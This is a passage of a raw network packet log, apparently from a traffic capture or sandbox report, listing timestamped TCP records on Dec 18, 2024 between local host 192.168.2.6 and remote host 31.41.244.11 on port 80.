                                                                                                                                                              Dec 18, 2024 11:47:18.296128988 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.296999931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.297045946 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.297163963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.297214985 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.298151970 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.298202038 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.298265934 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.298307896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.299320936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.299380064 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.299402952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.299446106 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.300492048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.300543070 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.300614119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.300652981 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.301733017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.301745892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.301783085 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.301804066 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.302879095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.302927971 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.303167105 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.303212881 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.304006100 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.304065943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.304533005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.304585934 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.305181980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.305231094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.305295944 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.305340052 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.306324005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.306372881 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.307216883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.307282925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.307497978 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.307538033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.307694912 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.307739973 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.308664083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.308713913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.308856964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.308909893 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.309834957 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.309884071 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.310520887 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.310580969 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.311038971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.311052084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.311089993 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.311111927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.312336922 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.312383890 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.312666893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.312716007 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.313381910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.313410044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.313430071 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.313437939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.314517975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.314575911 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.314661980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.314707041 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.315725088 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.315778017 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.315862894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.315907955 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.316878080 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.316925049 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.316984892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.317033052 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.318033934 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.318082094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.318145990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.318196058 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.319205046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.319251060 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.449074030 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.449132919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.449136019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.449168921 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.449693918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.449734926 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.449805021 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.449840069 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.450615883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.450670958 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.450692892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.450737953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.452080965 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.452138901 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.452142954 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.452182055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.453088999 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.453232050 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.453478098 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.454185963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.454206944 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.454226017 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.454248905 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.455235958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.455281019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.455378056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.455421925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.456413984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.456466913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.457076073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.457119942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.457664013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.457674980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.457719088 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.458802938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.458858013 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.458973885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.459014893 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.459953070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.460014105 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.460079908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.460119009 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.461088896 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.461134911 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.461303949 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.461355925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.462343931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.462393045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.462765932 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.462825060 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.463454962 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.463495016 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.464536905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.464601994 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.464673996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.464688063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.464710951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.464829922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.465771914 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.465820074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.465990067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.466031075 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.466947079 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.466975927 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.466984987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.467009068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.468121052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.468158960 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.468162060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.468233109 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.469274044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.469310045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.469372034 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.469419003 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.470489979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.470545053 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.470860004 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.470906019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.471621990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.471666098 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.471930027 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.471972942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.472805023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.472848892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.473021030 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.473057032 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.474023104 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.474036932 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.474076986 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.474076986 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.475127935 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.475197077 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.475338936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.475378990 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.476337910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.476387024 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.476553917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.476600885 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.477452993 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.477530956 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.477659941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.477699995 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.478673935 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.478693008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.478761911 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.478761911 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.479855061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.479899883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.480222940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.480274916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.480982065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.481026888 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.481137037 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.481184959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.482148886 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.482192993 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.482203960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.482245922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.483375072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.483401060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.483422995 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.483441114 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.484527111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.484543085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.484574080 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.484590054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.485657930 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.485708952 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.486829996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.486841917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.486866951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.486887932 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.486913919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.486944914 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.488024950 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.488051891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.488070965 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.488105059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.489320993 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.489363909 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.489799976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.489852905 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.491190910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.491244078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.491302013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.491348028 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.492018938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.492031097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.492054939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.492291927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.492827892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.492841005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.492882013 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.493045092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.493927956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.493941069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.493973017 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.495004892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.495044947 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.495289087 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.495331049 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.496370077 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.496411085 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.497097015 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.497154951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.497519016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.497584105 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.497642040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.497687101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.498500109 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.498548031 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.498768091 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.498831034 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.499686956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.499743938 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.500072956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.500118971 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.500886917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.500926018 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.500989914 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.501049042 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.502038002 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.502084970 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.502779961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.502824068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.503186941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.503235102 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.503582001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.503627062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.504405022 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.504420996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.504456997 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.505537033 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.505587101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.506247044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.506293058 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.506706953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.506753922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.506835938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.506911039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.507891893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.507931948 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.507951021 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.507973909 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.509119987 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.509136915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.509162903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.509181023 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.510166883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.510204077 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.640867949 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.640924931 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.641010046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.641057014 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.641587973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.641634941 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.641765118 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.641810894 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.642767906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.642813921 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.642857075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.642895937 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.643858910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.643922091 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.644000053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.644046068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.644820929 CET804980631.41.244.11192.168.2.6
